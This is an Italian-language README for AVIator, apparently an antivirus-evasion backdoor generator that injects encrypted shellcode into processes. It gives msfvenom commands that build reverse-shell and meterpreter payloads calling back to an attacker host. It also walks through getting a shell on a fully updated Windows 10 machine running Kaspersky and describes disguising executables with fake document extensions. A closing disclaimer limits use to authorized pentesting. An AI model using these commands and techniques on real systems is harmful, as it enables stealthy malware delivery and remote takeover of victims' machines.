
Progetto di evasione antivirus
AviAtor Portato a NETCore 5 con un'interfaccia utente aggiornata
Informazioni://nome
AV: Antivirus
Ator: È un spadaccino, alchimista, scienziato, mago, studioso e ingegnere, con la capacità di produrre talvolta oggetti dal nulla (https://en.wikipedia.org/wiki/Ator)
Informazioni://scopo
AV|Ator è un'utility generatrice di backdoor, che utilizza tecniche crittografiche e di iniezione per bypassare il rilevamento degli AV. Più specificamente:
[https://attack.mitre.org/techniques/T1055/]:
Iniezione di eseguibili portatili che comporta la scrittura di codice dannoso direttamente nel processo (senza un file su disco) e quindi l'invocazione dell'esecuzione con codice aggiuntivo o creando un thread remoto. Lo spostamento del codice iniettato introduce il requisito aggiuntivo di rimappare i riferimenti di memoria. Variazioni di questo metodo come l'iniezione riflessiva di DLL (scrittura di una DLL auto-mappante in un processo) e il modulo di memoria (mappatura DLL durante la scrittura nel processo) superano il problema del rilocazione degli indirizzi.
Dirottamento dell'esecuzione del thread che comporta l'iniezione di codice dannoso o il percorso di una DLL in un thread di un processo. Simile a Process Hollowing, il thread deve essere prima sospeso.
L'applicazione ha un modulo composto da tre input principali (vedi screenshot sotto):

Nota importante: lo shellcode deve essere fornito come array di byte C#.
I valori predefiniti contengono shellcode che esegue notepad.exe (32 bit). Questa demo è fornita come indicazione di come il codice dovrebbe essere formato (usando msfvenom, questo può essere facilmente fatto con l'opzione -f csharp, ad esempio msfvenom -p windows/meterpreter/reverse_tcp LHOST=X.X.X.X LPORT=XXXX -f csharp).
Dopo aver riempito gli input forniti e selezionato il percorso di output, viene generato un eseguibile in base alle opzioni scelte.
In parole semplici, si spaccia un file eseguibile per avere un'estensione 'innocua' come 'pdf', 'txt' ecc. Ad esempio, il file "testcod.exe" verrà interpretato come "tesexe.doc"
Attenzione al fatto che alcuni AV segnalano lo spoof di per sé come malware.
Immagino che tutti sappiate di cosa si tratta :)
Ottenere una shell in una macchina Windows 10 con Kaspersky AV completamente aggiornato
Creare il payload utilizzando msfvenom
msfvenom -p windows/x64/shell/reverse_tcp_rc4 LHOST=10.0.2.15 LPORT=443 EXITFUNC=thread RC4PASSWORD=S3cr3TP4ssw0rd -f csharp
Utilizzare AVIator con le seguenti impostazioni
Architettura del sistema operativo di destinazione: x64 Tecnica di iniezione: Thread Hijacking (Shellcode Arch: x64, OS arch: x64) Procedura di destinazione: explorer (lasciare il default)
Impostare il listener sulla macchina attaccante
Eseguire l'exe generato sulla macchina vittima
Windows:
Compila il progetto o scarica l'eseguibile già compilato dalla seguente cartella:
https://github.com/Ch0pin/AVIator/tree/master/Compiled%20Binaries
Linux:
Installa Mono secondo la tua distribuzione Linux, scarica ed esegui i binari
e.g. in kali:
root@kali# apt install mono-devel
root@kali# mono aviator.exe
A Damon Mohammadbagher per la procedura di crittografia
Ho sviluppato questa app per superare le impegnative sfide del processo di pentest e questo è l'UNICO MODO in cui questa app dovrebbe essere utilizzata. Assicurati di avere l'autorizzazione necessaria per utilizzarla contro un sistema e non usarla mai per scopi illegali.